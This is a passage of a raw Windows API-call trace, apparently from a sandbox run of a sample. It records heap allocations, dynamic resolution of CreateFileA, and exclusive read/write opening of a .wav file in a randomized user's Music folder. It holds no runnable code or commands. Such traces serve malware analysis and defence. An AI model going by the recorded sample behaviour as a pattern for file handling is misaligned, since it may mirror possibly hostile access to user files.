hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.122] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.122] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.122] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.122] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.123] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.125] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.127] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.128] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c868 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c868, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.128] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.128] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c868, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.129] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0039.129] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42) returned 0x88e138 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", cchWideChar=66, lpMultiByteStr=0x88e138, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav", lpUsedDefaultChar=0x0) returned 66 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.129] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\wioex9t.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0039.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 